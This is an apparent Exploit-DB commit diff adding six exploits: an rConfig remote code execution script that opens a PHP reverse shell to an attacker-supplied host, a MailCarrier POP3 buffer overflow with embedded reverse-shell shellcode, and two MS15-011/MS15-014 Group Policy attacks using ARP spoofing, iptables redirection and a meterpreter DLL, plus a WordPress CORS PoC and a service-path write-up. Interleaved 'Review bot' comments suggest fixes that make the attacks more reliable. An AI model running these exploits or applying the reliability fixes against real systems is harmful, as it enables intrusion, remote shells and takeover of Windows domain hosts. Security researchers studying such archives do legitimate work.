DB: 2019-10-30
6 changes to exploits/shellcodes Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass rConfig 3.9.2 - Remote Code Execution Wordpress 5.2.4 - Cross-Origin Resource Sharing
This commit is contained in:
parent
d4a236d578
commit
595ac97a33
7 changed files with 491 additions and 0 deletions
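--- /dev/null
+++ b/exploits/php/webapps/47555.py
@@ -0,0 +1,47 @@
+# Exploit Title: rConfig 3.9.2 - Remote Code Execution
+# Date: 2019-09-18
+# Exploit Author: Askar
+# Vendor Homepage: https://rconfig.com/
+# Software link: https://rconfig.com/download
+# Version: v3.9.2
+# Tested on: CentOS 7.7 / PHP 7.2.22
+# CVE : CVE-2019-16662
+
+#!/usr/bin/python
+
+import requests
+import sys
+from urllib import quote
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+if len(sys.argv) != 4:
+    print "[+] Usage : ./exploit.py target ip port"
+    exit()
+
+target = sys.argv[1]
+
+ip = sys.argv[2]
+
+port = sys.argv[3]
+
+payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))
+
+install_path = target + "/install"
+
+req = requests.get(install_path, verify=False)
+if req.status_code == 404:
+    print "[-] Installation directory not found!"
+    print "[-] Exploitation failed !"
+    exit()
+elif req.status_code == 200:
+    print "[+] Installation directory found!"
+    url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload
+
+    print "[+] Triggering the payload"
+    print "[+] Check your listener !"
+
+    requests.get(url_to_send, verify=False)
+
+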
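Review bot: The status-code dispatch `if req.status_code == 404: ... elif req.status_code == 200:` silently does nothing for any other response (301 to HTTPS, 403, 500), so a redirecting or hardened target exits with no output at all; add `else: print "[-] Unexpected status %d for /install" % req.status_code` so the operator can tell a blocked request from a patched host. The final `requests.get(url_to_send, verify=False)` has no timeout: the injected `exec("/bin/sh -i ...")` keeps the PHP request open for the life of the interactive shell, so the script blocks on that line rather than returning — pass `timeout=5` and treat the timeout as the expected outcome once the listener has a session. The script is Python 2 only (`print` statements, `from urllib import quote`), which is worth stating in the header next to `# Tested on:`.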
rConfig-preauth.png
|
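--- /dev/null
+++ b/exploits/php/webapps/47557.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Wordpress 5.2.4 - Cross-Origin Resource Sharing
+# Date: 2019-10-28
+# Exploit Author: Milad Khoshdel
+# Software Link: https://wordpress.org/download/
+# Version: Wordpress 5.2.4
+# Tested on: Linux Apache/2 PHP/7.2
+
+# Vulnerable Page:
+https://[Your-Domain]/wp-json
+
+# POC:
+# The web application fails to properly validate the Origin header (check Details section for more information)
+# and returns the header Access-Control-Allow-Credentials: true. In this configuration any website can issue
+# requests made with user credentials and read the responses to these requests. Trusting arbitrary
+# origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites.
+
+# REGUEST -->
+
+GET /wp-json/ HTTP/1.1
+Origin: https://www.evil.com
+Accept: */*
+Accept-Encoding: gzip,deflate
+Host: [Your-Domain]
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Connection: Keep-alive
+
+# RESPONSE -->
+
+HTTP/1.1 200 OK
+Date: Mon, 28 Oct 2019 07:34:39 GMT
+Server: NopeJS
+X-Robots-Tag: noindex
+Link: <https://[Your-Domain].com/wp-json/>; rel="https://api.w.org/"
+X-Content-Type-Options: nosniff
+Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
+Access-Control-Allow-Headers: Authorization, Content-Type
+Allow: GET
+Access-Control-Allow-Origin: https://www.evil.com
+Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
+Access-Control-Allow-Credentials: true
+Vary: Origin,Accept-Encoding,User-Agent
+Keep-Alive: timeout=2, max=73
+Connection: Keep-Alive
+Content-Type: application/json; charset=UTF-8
+Original-Content-Encoding: gzip
+Content-Length: 158412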
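Review bot: The PoC only shows an unauthenticated `GET /wp-json/` whose Origin is reflected, so it does not demonstrate the impact claimed in the `# POC:` paragraph — that a third-party origin can read responses made with the victim's credentials. As the WordPress REST API handbook describes it, cookie authentication is ignored unless the request also carries a valid `X-WP-Nonce`, which a cross-origin page cannot obtain, so the reflected `Access-Control-Allow-Origin` together with `Access-Control-Allow-Credentials: true` is core's intended behaviour rather than a same-origin-policy bypass; if the author disagrees, the advisory needs a credentialed cross-origin request that returns data an anonymous user cannot see (for example `/wp-json/wp/v2/users/me`). The `# The web application fails to properly validate the Origin header (check Details section ...)` line points at a Details section that is not in the file. Also `# REGUEST -->` is a typo for `# REQUEST -->`.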
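--- /dev/null
+++ b/exploits/windows/local/47556.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path
+# Discovery Date: 2019-10-28
+# Exploit Author: Alberto Vargas
+# Vendor Homepage: https://www.issivs.com/product-detail/secure-os-enterprise/
+# Software Link: https://www.issivs.com/schedule-a-free-demo/(trial version for unlicensed users)
+# Version: 10.2 R1
+# Tested on: Windows 10 Pro x64 Esp
+
+# Version: 10.0.18362
+
+# Schedule A Free Demo - ISS - Intelligent Security Systems<https://www.issivs.com/schedule-a-free-demo/>
+# Schedule a Free Demo A leading developer of security surveillance and control systems for
+# networked digital video and audio recording, video image pattern processing and digital data transmission.
+# www.issivs.com
+
+# Summary: ISS’ global standard for video management, access control and video analytics, SecurOS™ Enterprise is perfectly suited for
+# managing large and demanding installations. The Enterprise framework can manage and monitor an unlimited number of cameras and devices, apply
+# intelligent video analytics, and act as an integration platform for a variety of 3rd party systems. Built to handle enterprise level deployments,
+# SecurOS Enterprise, comes with built-in Native Failure functionality, Microsoft Active Directory / LDAP integration, and has an extensive set
+# of Cybersecurity features making it one of the most reliable and secure video management platforms in the market today. SecurOS Enterprise
+# supports all the features of the other 3 editions.
+
+# Description: The application suffers from an unquoted search path issue impacting the service 'SecurosCtrlService'. This could potentially allow an
+# authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require
+# the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could
+# potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
+# of the application.
+
+# Step to discover the unquoted Service:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+SecurOS Control Service SecurosCtrlService C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe Auto
+
+# Service info:
+
+C:\Users\user>sc qc SecurosCtrlService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SecurosCtrlService
+TIPO : 10 WIN32_OWN_PROCESS
+TIPO_INICIO : 2 AUTO_START
+CONTROL_ERROR : 1 NORMAL
+NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe
+GRUPO_ORDEN_CARGA :
+ETIQUETA : 0
+NOMBRE_MOSTRAR : SecurOS Control Service
+DEPENDENCIAS :
+NOMBRE_INICIO_SERVICIO: LocalSystem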
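Review bot: The write-up never shows that either path CreateProcess would try before the real binary for `C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe` — `C:\Program.exe` or `C:\Program Files.exe` — can be written by the non-privileged user, and on a default Windows 10 install neither `C:\` nor `C:\Program Files (x86)\` allows that. Exploitability therefore rests on a loosened ACL rather than on the missing quotes alone, so the advisory should state that precondition and include the `icacls "C:\"` and `icacls "C:\Program Files (x86)"` output alongside the `sc qc` dump; the `# Description:` wording "insert their code in the system root path" should name those two concrete candidate files instead. The `# Summary:` marketing paragraph and the duplicated `# Schedule A Free Demo` lines add nothing to the finding and would be better replaced by that evidence. The service running as `NOMBRE_INICIO_SERVICIO: LocalSystem` with `TIPO_INICIO : 2 AUTO_START` is the part that makes the impact SYSTEM-level and deserves a sentence of its own.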
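--- /dev/null
+++ b/exploits/windows/remote/47554.py
@@ -0,0 +1,66 @@
+# Exploit Title: Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow
+# Date: 2019-10-01
+# Author: Lance Biggerstaff
+# Original Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Tested on: Windows 10
+# Note: Every version of Windows 10 has a different offset ¯\_(ツ)_/¯
+
+#!/usr/bin/python
+
+import sys
+import socket
+import time
+
+#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISYTENING_PORT -b '\x00\xd9' -f python
+
+buf = ""
+buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"
+buf += "\x76\x0e\xe7\xb4\xfe\x5c\x83\xee\xfc\xe2\xf4\x1b\x5c"
+buf += "\x7c\x5c\xe7\xb4\x9e\xd5\x02\x85\x3e\x38\x6c\xe4\xce"
+buf += "\xd7\xb5\xb8\x75\x0e\xf3\x3f\x8c\x74\xe8\x03\xb4\x7a"
+buf += "\xd6\x4b\x52\x60\x86\xc8\xfc\x70\xc7\x75\x31\x51\xe6"
+buf += "\x73\x1c\xae\xb5\xe3\x75\x0e\xf7\x3f\xb4\x60\x6c\xf8"
+buf += "\xef\x24\x04\xfc\xff\x8d\xb6\x3f\xa7\x7c\xe6\x67\x75"
+buf += "\x15\xff\x57\xc4\x15\x6c\x80\x75\x5d\x31\x85\x01\xf0"
+buf += "\x26\x7b\xf3\x5d\x20\x8c\x1e\x29\x11\xb7\x83\xa4\xdc"
+buf += "\xc9\xda\x29\x03\xec\x75\x04\xc3\xb5\x2d\x3a\x6c\xb8"
+buf += "\xb5\xd7\xbf\xa8\xff\x8f\x6c\xb0\x75\x5d\x37\x3d\xba"
+buf += "\x78\xc3\xef\xa5\x3d\xbe\xee\xaf\xa3\x07\xeb\xa1\x06"
+buf += "\x6c\xa6\x15\xd1\xba\xdc\xcd\x6e\xe7\xb4\x96\x2b\x94"
+buf += "\x86\xa1\x08\x8f\xf8\x89\x7a\xe0\x3d\x16\xa3\x37\x0c"
+buf += "\x6e\x5d\xe7\xb4\xd7\x98\xb3\xe4\x96\x75\x67\xdf\xfe"
+buf += "\xa3\x32\xde\xf4\x34\x27\x1c\xec\x59\x8f\xb6\xfe\x5c"
+buf += "\xf2\x3d\x18\x0c\xb7\xe4\xae\x1c\xb7\xf4\xae\x34\x0d"
+buf += "\xbb\x21\xbc\x18\x61\x69\x36\xf7\xe2\xa9\x34\x7e\x11"
+buf += "\x8a\x3d\x18\x61\x7b\x9c\x93\xbe\x01\x12\xef\xc1\x12"
+buf += "\xb4\x80\xb4\xfe\x5c\x8d\xb4\x94\x58\xb1\xe3\x96\x5e"
+buf += "\x3e\x7c\xa1\xa3\x32\x37\x06\x5c\x99\x82\x75\x6a\x8d"
+buf += "\xf4\x96\x5c\xf7\xb4\xfe\x0a\x8d\xb4\x96\x04\x43\xe7"
+buf += "\x1b\xa3\x32\x27\xad\x36\xe7\xe2\xad\x0b\x8f\xb6\x27"
+buf += "\x94\xb8\x4b\x2b\xdf\x1f\xb4\x83\x74\xbf\xdc\xfe\x1c"
+buf += "\xe7\xb4\x94\x5c\xb7\xdc\xf5\x73\xe8\x84\x01\x89\xb0"
+buf += "\xdc\x8b\x32\xaa\xd5\x01\x89\xb9\xea\x01\x50\xc3\xbb"
+buf += "\x7b\x2c\x18\x4b\x01\xb5\x7c\x4b\x01\xa3\xe6\x77\xd7"
+buf += "\x9a\x92\x75\x3d\xe7\x17\x01\x5c\x0a\x8d\xb4\xad\xa3"
+buf += "\x32\xb4\xfe\x5c"
+
+jmpesp = '\x23\x49\xA1\x0F'
+
+#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+buffer = '\x41' * 5095 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+#buffer = '\x41' * 5097 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+#buffer = '\x41' * 5099 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+
+print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.121.87", 110))
+print s.recv(1024)
+s.send('USER ' + buffer + '\r\n')
+print s.recv(1024)
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, but if you get here the exploit failed!"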
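Review bot: The trailer `'\x43' * (5096 - 4 - 20 - 1730)` hard-codes a 1730-byte payload, but `buf` as listed is 28 lines of 13 bytes plus a 4-byte tail, i.e. 368 bytes, so the USER argument is about 1.3 KB shorter than the arithmetic implies and every `msfvenom` regeneration silently changes it again; use `'\x43' * (5096 - 4 - 20 - len(buf))` so the total stays fixed. The target is hard-wired in `connect=s.connect(("192.168.121.87", 110))` even though `sys` is imported and unused — take host and port from `sys.argv` with a usage line. `jmpesp = '\x23\x49\xA1\x0F'` is undocumented; a one-line comment naming the module the `jmp esp` comes from (and whether that module is ASLR-rebased) would explain why `# Note: Every version of Windows 10 has a different offset` is the only thing that varies. Finally `print s.recv(1024)` after the overflow has no `s.settimeout()`, so a crashed service leaves the script hanging instead of ever reaching the `[*] Done` message.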
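--- /dev/null
+++ b/exploits/windows/remote/47558.py
@@ -0,0 +1,152 @@
+# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
+# Date: 2019-10-28
+# Exploit Author: Thomas Zuk
+# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012,
+# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
+# Tested on: Windows 7 , Windows Server 2012
+# CVE : CVE-2015-0008
+# Type: Remote
+# Platform: Windows
+
+# Description: While there exists multiple advisories for the vulnerability and video demos of
+# successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code
+# targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level
+# remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys).
+
+#!/usr/bin/python3
+
+import argparse
+import os
+import subprocess
+import socket
+import fcntl
+import struct
+
+# MS15-011 Exploit.
+# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011
+# Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
+# Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
+# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.
+
+def arpSpoof(interface, hostIP, targetIP):
+    arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
+    arpArgs = arpCmd.split()
+    print("Arpspoofing: %s" % (arpArgs))
+    p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
+
+
+def karmaSMB(hostIP):
+    print("reverting GptTmpl.inf from bak")
+    os.system("cp GptTmpl.inf.bak GptTmpl.inf")
+    appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP)
+    CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP)
+    f = open("GptTmpl.inf","a", encoding='utf-16le')
+    f.write(appInit)
+    f.write(CURunKey)
+    f.close()
+
+    path = os.getcwd()
+
+    fConfig = open("smb.conf","w")
+    fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n")
+    fConfig.close()
+
+    karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ "
+    os.system(karmaCmd)
+
+
+def iptables_config(targetIP, hostIP):
+    print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
+    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
+    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
+    print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
+    os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
+    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
+    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
+    os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')
+
+
+def get_interface_address(ifname):
+    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])
+
+def generatePayload(lhost, lport):
+    print("generating payload(s) and metasploit resource file")
+    msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
+    os.system(msfDll)
+    msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)
+    print("metasploit resource script: %s" % msfResource)
+    print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")
+
+    file = open("meta_resource.rc", "w+")
+    file.write(msfResource)
+    file.close()
+
+
+
+if __name__ == '__main__':
+
+    parser = argparse.ArgumentParser()
+
+    # Add arguments
+    parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True)
+    parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
+    parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
+    parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False)
+    parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False)
+
+    args = parser.parse_args()
+
+    # Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files.
+    print ("checking for missing file(s)")
+    if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):
+        print("Requirements missing. Downloading required files from github")
+        os.system("git clone https://github.com/Freakazoidile/MS15-011-Files")
+        os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/")
+
+    # Get the provided interfaces IP address
+    ipAddr = get_interface_address(args.interface)
+
+    if args.lhost is not None:
+        lhost = args.lhost
+    else:
+        lhost = ipAddr
+
+    if args.lport is not None:
+        lport = args.lport
+    else:
+        lport = '4444'
+
+
+    dcSpoof = ""
+    dcCommaList = ""
+    count = 0
+
+    # loop over the domain controllers, poison each and target the host IP
+    # create a comma separated list of DC's
+    # create a "-t" separate list of DC's for use with arpspoof
+    for dc in args.domain_controller:
+        dcSpoof += "-t %s " % (dc)
+        if count > 0:
+            dcCommaList += ",%s" % (dc)
+        else:
+            dcCommaList += "%s" % (dc)
+
+        arpSpoof(args.interface, dc, "-t %s" % (args.target_ip))
+        count += 1
+
+    # arpspoof the target and all of the DC's
+    arpSpoof(args.interface, args.target_ip, dcSpoof)
+
+    # generate payloads
+    generatePayload(lhost, lport)
+
+    # Setup iptables forwarding rules
+    iptables_config(args.target_ip, ipAddr)
+
+    #run Karmba SMB Server
+    karmaSMB(ipAddr)
+
+
+    print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers))
+    print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")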
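Review bot: The closing `print("Targeting %s by arp spoofing %s and domain controllers: %s " % (..., args.domain_controllers))` reads `args.domain_controllers`, but argparse exposes the `--domain_controller` option as `args.domain_controller`, so the script ends in an AttributeError — and only after the blocking `os.system(karmaCmd)` inside `karmaSMB` returns, which is also why the "stop all instances of arpspoof and flush firewall rules" warning is never shown while the attack is actually running; move both prints above `karmaSMB(ipAddr)` and use the already-built `dcCommaList` there. The prerequisite check `if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):` only clones when both files are missing, so a half-present checkout proceeds and fails later in `karmaSMB`; it should be `or`. Nothing tears down the `arpspoof` children or the `iptables -t nat` rules on Ctrl-C — `arpSpoof` discards its Popen handle as `p` and its stdout pipe is never drained — so the operator is left to clean the lab network by hand; a `try/finally` around the launch that terminates the saved handles and flushes the NAT chain is the missing piece. The runtime `git clone https://github.com/Freakazoidile/MS15-011-Files` pulls unpinned third-party code onto the attack host; pin it to a commit hash or ship the files with the exploit.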
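--- /dev/null
+++ b/exploits/windows/remote/47559.py
@@ -0,0 +1,125 @@
+# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass
+# Date: 2019-10-28
+# Exploit Author: Thomas Zuk
+# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2,
+# Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
+# Tested on: Windows 7 , Windows Server 2012
+# CVE : CVE-2015-0009
+# Type: Remote
+# Platform: Windows
+
+# Description: This exploit code targets vulnerable systems in order to corrupt GPO updates which causes
+# the target system to revert various security settings to their default settings. This includes SMB server
+# and network client settings, which by default do not require SMB signing except for domain controllers.
+# Successful exploitation against a system with a hardened configuration that requires SMB Signing by the
+# network client will make the target system vulnerable to MS15-011, which can lead to remote code execution.
+
+#!/usr/bin/python3
+
+import argparse
+import fcntl
+import os
+import socket
+import struct
+import subprocess
+from subprocess import PIPE
+import re
+
+# MS15-014 Exploit.
+# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-014
+# Example usage: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
+# Example usage with multiple DC's: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
+# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.
+
+def arpSpoof(interface, hostIP, targetIP):
+    arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
+    arpArgs = arpCmd.split()
+    print("Arpspoofing: %s" % (arpArgs))
+    p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
+
+
+def corrupt_packet():
+    global count
+
+    # NetSed listen port 446 (iptables redirected), modify traffic, then forward to destination 445.
+    netsedCmd = "netsed tcp 446 0 445 s/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00%00" #>/dev/null 2>&1 &
+    netsedArgs = netsedCmd.split()
+    print("Starting NetSed!")
+    print("NetSed: %s" % (netsedArgs))
+    netsedP = subprocess.Popen(netsedArgs, stdout=PIPE, stderr=subprocess.STDOUT)
+
+
+    while True:
+        o = (netsedP.stdout.readline()).decode('utf-8')
+
+        if o != '':
+            if args['verbose']:
+                print("NetSed output: %s" % o)
+
+            if re.search('Applying rule', o) is not None:
+                count += 1
+                print('packet corrupted: % s' % count)
+                # During testing, after 4 attempts to retrieve GptTmpl.inf the exploit was successful. Sometimes the machine requested the file 7 times, but exploitation was always successful after 4 attempts.
+                # The script waits for up to 7 for reliability. Tested on Windows 7 SP1 and Server 2012 R2
+                if count == 4:
+                    print("Exploit has likely completed!! waiting for up to 7 corrupted packets for reliability. \nIf no more packets are corrupted in the next couple of minutes kill this script. The target should be reverted to default settings with SMB signing not required on the client. \nTarget can now be exploited with MS15-011 exploit.")
+
+                #During testing, after 7 attempts to retrieve GptTmpl.inf the GPO update stopped and exploitation was successful.
+                if count == 7:
+                    break
+
+
+def get_interface_address(ifname):
+    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])
+
+def iptables_config(targetIP, hostIP):
+    #allow forwarding, redirect arpspoofed traffic from dport 445 to 446 for NetSed.
+    print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
+    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446')
+    print('[+] Make sure to cleanup iptables after exploit completes')
+    os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
+    os.system('iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446')
+
+if __name__ == '__main__':
+
+    parser = argparse.ArgumentParser(description='Find the SecEdit\GptTmpl.inf UUID to exploit MS15-014')
+    parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-014", required=True)
+    parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
+    parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
+    parser.add_argument("-v", "--verbose", help="Toggle verbose mode. displays all output of NetSed, very busy terminal if enabled.", action='store_true')
+
+    args = vars(parser.parse_args())
+
+    target_ip = args['target_ip']
+
+    count = 0
+
+    # Get the provided interfaces IP address
+    ipAddr = get_interface_address(args['interface'])
+
+    dcSpoof = ""
+    dcCommaList = ""
+    dcCount = 0
+
+    # loop over the domain controllers, poison each and target the host IP
+    # create a comma separated list of DC's
+    # create a "-t" separate list of DC's for use with arpspoof
+    for dc in args['domain_controller']:
+        dcSpoof += "-t %s " % (dc)
+        if dcCount > 0:
+            dcCommaList += ",%s" % (dc)
+        else:
+            dcCommaList += "%s" % (dc)
+
+        arpSpoof(args['interface'], dc, "-t %s" % (target_ip))
+        dcCount += 1
+
+    # arpspoof the target and all of the DC's
+    arpSpoof(args['interface'], target_ip, dcSpoof)
+
+    # Setup iptables forwarding rules
+    iptables_config(target_ip, ipAddr)
+
+    #identify requests for GptTmpl.inf and modify the packet to corrupt it using NetSed.
+    corrupt_packet()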
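Review bot: The `while True:` loop in `corrupt_packet` never checks whether `netsedP` is still alive: once netsed exits (port 446 already bound, or it is killed), `readline()` returns `b''` on every call, `o != ''` is false, and the loop spins at full CPU forever without ever reaching `break`; add `if o == '' and netsedP.poll() is not None: break` directly after the readline. `arpSpoof` launches each `arpspoof` with `stdout=subprocess.PIPE` but the pipe is never read and the handle `p` is discarded; arpspoof prints a line for every reply it injects, so on a long run the pipe buffer fills, the process blocks on write and the poisoning silently stops — use `stdout=subprocess.DEVNULL` (or drain it in a thread) and keep the handle so it can be terminated on exit. The `iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446` rule has no `-s`/`-d` match, so every SMB flow forwarded through this host is fed to netsed, not just the target's GPO fetch from the listed DCs; restrict it with `-s %s -d %s` for the target and DC addresses, and note that `[+] Make sure to cleanup iptables after exploit completes` is currently the only teardown on offer.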
|
@ -10736,6 +10736,7 @@ id,file,description,date,author,type,platform,port
|
|||
47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux,
|
||||
47549,exploits/windows/local/47549.txt,"JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path",2019-10-28,"Roberto Escamilla",local,windows,
|
||||
47551,exploits/windows/local/47551.py,"ChaosPro 2.0 - Buffer Overflow (SEH)",2019-10-28,SYANiDE,local,windows,
|
||||
47556,exploits/windows/local/47556.txt,"Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path",2019-10-29,"Alberto Vargas",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -17738,6 +17739,9 @@ id,file,description,date,author,type,platform,port
|
|||
